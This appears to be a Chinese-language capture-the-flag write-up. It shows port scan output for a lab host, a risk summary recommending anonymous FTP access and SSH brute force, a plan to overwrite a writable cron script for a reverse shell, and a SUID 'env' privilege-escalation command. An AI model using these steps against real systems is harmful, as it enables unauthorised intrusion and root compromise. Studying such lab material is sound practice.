[INF] Current naabu version 2.3.1 (outdated) [INF] Running CONNECT scan with non root privileges 10.10.226.88:445 10.10.226.88:21 10.10.226.88:139 10.10.226.88:22 [INF] Found 4 ports on host 10.10.226.88 (10.10.226.88)
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.17.5.121 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA) | 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA) |_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.17 seconds
扫描总结:
目标主机:
IP 地址:10.10.226.88
主机状态:在线,延迟 0.27s
操作系统:Linux,使用 Samba 服务模拟 Windows 信息(版本 Samba 4.7.6)
端口信息:
**21/tcp (FTP)**:
服务:vsftpd 3.0.3
特性:
支持匿名登录(Anonymous FTP)
存在一个可写目录:/scripts
没有会话带宽限制
安全性:匿名登录与可写目录可能存在敏感信息或恶意文件上传的风险。
**22/tcp (SSH)**:
服务:OpenSSH 7.6p1 (Ubuntu)
支持协议:SSH 2.0
Hostkey 类型:RSA、ECDSA、ED25519
安全性:未显示明显漏洞,但可尝试弱口令或暴力破解测试。
**139/tcp 和 445/tcp (SMB)**:
服务:Samba 文件共享服务
版本:Samba 4.7.6-Ubuntu
特性:
NetBIOS 名称:ANONYMOUS
工作组:WORKGROUP
认证模式:用户级别认证,但消息签名被禁用(不安全)
系统时间:2024-11-20T14:30:58
潜在风险:
FTP 匿名登录和可写目录可能被用于上传恶意文件。
SMB 消息签名被禁用,可能受到中间人攻击。
可以进一步枚举 SMB 服务,查看是否存在敏感共享目录。
端口 22 可以尝试基于暴力破解或默认凭据的测试。
下一步建议:
针对 FTP:
登录匿名 FTP,检查可用文件或上传测试文件验证是否支持写入。
检查 /scripts 目录下是否存在敏感文件。
针对 SMB:
使用 smbclient 或其他工具进一步枚举共享资源。
确认是否有未授权访问的目录或敏感数据。
针对 SSH:
尝试弱口令暴力破解或利用已知漏洞进行测试。
综合测试:
针对 SMB 和 FTP 的未授权访问,重点检查是否泄露敏感信息或配置文件。
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(leo㉿HACK)-[~] └─$ cat clean.sh #!/bin/bash
tmp_files=0 echo $tmp_files if [ $tmp_files=0 ] then echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log else for LINE in $tmp_files; do rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done fi
思路: 上传恶意的clean.sh 替换这个 导致反弹shell
路径枚举
漏洞发现
漏洞利用
webshell
usershell
rootshell
env具有suid 权限可以进行提权
1
/usr/bin/env /bin/sh -p
知识点回顾
使用 find 查找所有系统 SUID 程序
可以更精确地查看系统中常见的目录中具有 SUID 权限的程序,例如:
find /bin /sbin /usr/bin /usr/sbin -type f -perm -4000 2>/dev/null